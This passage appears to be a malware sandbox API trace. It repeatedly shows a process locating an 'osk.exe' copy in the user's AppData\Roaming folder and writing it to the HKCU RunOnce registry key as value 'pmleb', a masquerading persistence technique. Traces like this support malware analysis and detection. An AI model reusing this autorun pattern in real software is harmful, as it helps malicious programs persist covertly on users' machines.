ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.499] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.499] IUnknown:Release (This=0x787518) returned 0x1 [0082.499] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.499] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.499] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.499] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.499] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, 
[1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.500] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.500] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.500] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.500] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.500] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x78 [0082.500] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.500] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x79 [0082.500] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, 
wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.501] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x78 [0082.501] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.501] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.501] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.501] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.501] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.501] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.501] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.501] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.502] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.502] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.502] RegCloseKey (hKey=0x280) returned 0x0 [0082.502] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.502] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.502] SetTimer (hWnd=0x20280, nIDEvent=0x20f4, uElapse=0xa, lpTimerFunc=0x0) returned 0x20f4 [0082.502] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.514] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.514] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.514] KillTimer (hWnd=0x20280, uIDEvent=0x20f4) returned 1 [0082.514] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.514] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, 
Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.514] IUnknown:Release (This=0x787518) returned 0x1 [0082.515] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.515] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.515] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.515] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.515] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 
0x80004002 [0082.515] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.515] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.515] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.515] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.515] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x79 [0082.515] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.515] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7a [0082.515] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, 
pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.516] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x79 [0082.516] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.516] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.516] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.516] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.516] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.516] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.517] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.517] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, 
phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.517] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.517] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.517] RegCloseKey (hKey=0x280) returned 0x0 [0082.517] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.517] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.517] SetTimer (hWnd=0x20280, nIDEvent=0x20f5, uElapse=0xa, lpTimerFunc=0x0) returned 0x20f5 [0082.517] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.529] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.529] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.530] KillTimer (hWnd=0x20280, uIDEvent=0x20f5) returned 1 [0082.530] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.530] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 
[0082.530] IUnknown:Release (This=0x787518) returned 0x1 [0082.530] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.530] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.530] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.530] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.530] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.530] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, 
Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.530] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.530] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.531] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.531] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7a [0082.531] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.531] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7b [0082.531] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), 
pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.531] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7a [0082.532] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.532] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.532] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.532] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.532] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.532] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.532] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.532] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.532] WideCharToMultiByte (in: 
CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.532] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.532] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.533] RegCloseKey (hKey=0x280) returned 0x0 [0082.533] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.533] ISystemDebugEventFire:IsActive 